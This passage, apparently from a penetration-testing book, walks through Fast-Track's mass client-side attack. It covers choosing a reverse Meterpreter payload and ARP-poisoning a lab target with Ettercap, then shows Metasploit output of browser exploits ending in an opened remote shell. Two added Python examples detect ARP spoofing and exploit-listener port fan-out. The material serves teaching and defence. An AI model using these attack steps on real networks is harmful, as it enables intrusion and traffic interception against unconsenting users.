Mass Client-Side Attack

The mass client-side attack is similar to the Browser Autopwn function; however, this attack includes additional exploits and built-in features that can incorporate ARP cache and DNS poisoning on the target’s machine, and additional browser exploits not included in Metasploit.

When a user connects to your web server, Fast-Track will fire off every exploit in its arsenal as well as those in the Metasploit Framework. If the user’s machine is susceptible to a specific vulnerability within one of these libraries, the attacker will obtain full access to the target machine.

  Enter the number: 4

  . . . SNIP . . .

  Enter the IP Address you want the web server to listen on: 10.211.55.130

  Specify your payload:

  1. Windows Meterpreter Reverse Meterpreter
  2. Generic Bind Shell
  3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
  4. Reverse TCP Shell

  Enter the number of the payload you want: 1

After selecting option 4, Mass Client-Side Attack, from the main menu, tell Fast-Track what IP address the web server should listen on, and then choose a payload.

Next, decide whether to use Ettercap to ARP-poison your target machine. Ettercap intercepts every request the target makes and redirects it to your malicious server. After confirming that you want to use Ettercap, enter the IP address of the target you want to poison. Fast-Track then sets up Ettercap for you.

  Would you like to use Ettercap to ARP poison a host yes or no: yes

  . . . SNIP . . .

  What IP Address do you want to poison: 10.211.55.128
  Setting up the ettercap filters....
  Filter created...
  Compiling Ettercap filter...

  . . . SNIP . . .

  Filter compiled...Running Ettercap and poisoning target...

Once a client connects to your malicious server, Metasploit fires exploits at the target. In the following listing, you can see that the Adobe exploit is successful, and a Meterpreter shell is waiting.

Note

ARP cache poisoning can be combined with this attack, but it works only when you are on the same local, unrestricted subnet as the target, because ARP replies never cross a router.
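From the defender's side, the Ettercap step described above leaves a recognisable trace on the wire: a single MAC address starts answering ARP for IP addresses that another MAC already owns (the gateway toward the victim and the victim toward the gateway). The following detector is an added example, not code from the book or from Fast-Track/Ettercap. It parses raw Ethernet/ARP reply frames and flags both an IP-to-MAC conflict and one MAC claiming several IPs. The two host IPs reuse the addresses from the listing; the MAC addresses, the capture, and the static "trusted" gateway entry are constructed placeholders for this example.

```python
import struct
from collections import defaultdict

# Constructed sample addresses: IPs follow the page's listing, MACs are invented placeholders.
GATEWAY_IP, VICTIM_IP = "10.211.55.1", "10.211.55.128"
GATEWAY_MAC = bytes.fromhex("aabbcc000001")
VICTIM_MAC = bytes.fromhex("aabbcc000128")
ATTACKER_MAC = bytes.fromhex("aabbcc000130")   # the MAC Ettercap would answer from


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: bytes, sender_ip: str, target_mac: bytes, target_ip: str) -> bytes:
    """Build a raw Ethernet II + ARP reply frame; used only to construct offline sample input."""
    ethernet = target_mac + sender_mac + b"\x08\x06"            # dst MAC, src MAC, EtherType 0x0806 (ARP)
    arp_header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)      # Ethernet, IPv4, hlen 6, plen 4, opcode 2 = reply
    arp_body = sender_mac + ip_bytes(sender_ip) + target_mac + ip_bytes(target_ip)
    return ethernet + arp_header + arp_body


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]

    def mac(raw):
        return ":".join(f"{b:02x}" for b in raw)

    def ip(raw):
        return ".".join(str(b) for b in raw)

    return opcode, mac(body[0:6]), ip(body[6:10]), mac(body[10:16]), ip(body[16:20])


class ArpSpoofDetector:
    """Flags ARP replies whose sender MAC contradicts the first-seen (or statically trusted) MAC for that IP,
    and any MAC that claims more than one IP, which is what poisoning both ends of a conversation looks like."""

    def __init__(self, trusted=None):
        self.trusted = dict(trusted or {})      # ip -> mac, e.g. a static entry for the gateway
        self.learned = {}                        # ip -> first mac seen claiming it (never overwritten)
        self.ips_by_mac = defaultdict(set)       # mac -> every ip it has claimed so far
        self.alerts = []

    def observe(self, frame: bytes):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:     # only ARP replies are checked
            return []
        _, sender_mac, sender_ip, _, _ = parsed
        new_alerts = []
        expected = self.trusted.get(sender_ip, self.learned.get(sender_ip))
        if expected is None:
            self.learned[sender_ip] = sender_mac
        elif expected != sender_mac:
            new_alerts.append(f"conflict: {sender_ip} is {expected} but {sender_mac} now claims it")
        self.ips_by_mac[sender_mac].add(sender_ip)
        if len(self.ips_by_mac[sender_mac]) > 1:
            new_alerts.append(f"multi-claim: {sender_mac} claims {sorted(self.ips_by_mac[sender_mac])}")
        self.alerts.extend(new_alerts)
        return new_alerts


def run_demo():
    """Replay a constructed capture: two legitimate replies, then the two poisoned replies a MITM sends."""
    capture = [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # gateway answers victim
        build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),    # victim answers gateway
        build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # poison: attacker claims gateway
        build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # poison: attacker claims victim
    ]
    detector = ArpSpoofDetector(trusted={GATEWAY_IP: "aa:bb:cc:00:00:01"})
    for frame in capture:
        detector.observe(frame)
    return detector.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The static `trusted` entry for the gateway matters in practice: a learning-only detector that boots after the attacker has already poisoned the segment would "learn" the attacker's MAC as legitimate, whereas a pinned gateway entry catches the conflict regardless of start order.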

  [*] Local IP: http://10.211.55.130:8071/
  [*] Server started.
  [*] Handler binding to LHOST 0.0.0.0
  [*] Started reverse handler
  [*] Exploit running as background job.
  [*] Using URL: http://0.0.0.0:8072/
  [*] Local IP: http://10.211.55.130:8072/
  [*] Server started.
  msf exploit(zenturiprogramchecker_unsafe) >
  [*] Handler binding to LHOST 0.0.0.0
  [*] Started reverse handler
  [*] Using URL: http://0.0.0.0:8073/
  [*] Local IP: http://10.211.55.130:8073/
  [*] Server started.
  [*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...
  [*] Attempting to exploit ani_loadimage_chunksize
  [*] Sending HTML page to 10.211.55.128:1047...
  [*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
  [*] Sending exploit to 10.211.55.128:1049...
  [*] Attempting to exploit ani_loadimage_chunksize
  [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to
      10.211.55.128:1076...
  [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
  [*] Sending stage (718336 bytes)
  [*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077)
  msf exploit(zenturiprogramchecker_unsafe) > sessions -l

  Active sessions
  ===============

  Id Description Tunnel
  -- ----------- ------
  1 Meterpreter 10.211.55.130:9007 -> 10.211.55.128:1077

  msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
  [*] Starting interaction with 1...

  meterpreter >
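The listing above also shows what this attack looks like from a web proxy or egress log: one client (10.211.55.128) pulls content from the same host on several freshly bound ports (8071, 8072, 8073) within seconds, because each exploit module gets its own listener. The following detection logic is an added example, not part of the book or of Metasploit; the log format (ISO timestamp, client IP, method, URL), the sample lines, and the thresholds of three distinct ports inside a 60-second window are constructed assumptions for this example and would need tuning against real traffic.

```python
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log in an assumed "timestamp client method url" format.
# Ports and hosts mirror the listing above; the timestamps and paths are invented.
SAMPLE_LOG = """\
2011-05-01T10:00:01 10.211.55.128 GET http://10.211.55.130:8071/
2011-05-01T10:00:02 10.211.55.128 GET http://10.211.55.130:8072/
2011-05-01T10:00:04 10.211.55.128 GET http://10.211.55.130:8073/
2011-05-01T10:00:05 10.211.55.128 GET http://10.211.55.130:8071/abcd.pdf
2011-05-01T10:00:10 10.211.55.129 GET http://10.211.55.130:8071/
2011-05-01T10:30:00 10.211.55.129 GET http://10.211.55.130:8072/
2011-05-01T10:30:01 10.211.55.129 GET https://www.example.com/
"""


def parse_line(line: str):
    """Split one log line into (timestamp, client, server_host, server_port); default ports by scheme."""
    timestamp, client, _method, url = line.split()
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return datetime.fromisoformat(timestamp), client, parts.hostname, port


def find_port_fanout(log_text: str, window_seconds: int = 60, min_ports: int = 3):
    """Return {(client, host): sorted_ports} for every client/host pair that touched
    at least `min_ports` distinct server ports within any `window_seconds` span."""
    events = defaultdict(list)                       # (client, host) -> [(timestamp, port), ...]
    for line in log_text.splitlines():
        if line.strip():
            timestamp, client, host, port = parse_line(line)
            events[(client, host)].append((timestamp, port))

    hits = {}
    for key, entries in events.items():
        entries.sort()
        # Slide a window anchored at each request; stop at the first window that crosses the threshold.
        for index, (start, _) in enumerate(entries):
            ports = {port for ts, port in entries[index:]
                     if (ts - start).total_seconds() <= window_seconds}
            if len(ports) >= min_ports:
                hits[key] = sorted(ports)
                break
    return hits


if __name__ == "__main__":
    for (client, host), ports in find_port_fanout(SAMPLE_LOG).items():
        print(f"{client} fetched from {host} on ports {ports} within 60s")
```

Client 10.211.55.129 also reaches two of the same ports, but half an hour apart, so it stays below the threshold; the window is what separates a browser that was herded through a row of exploit listeners from ordinary traffic to a host that legitimately serves on a few ports.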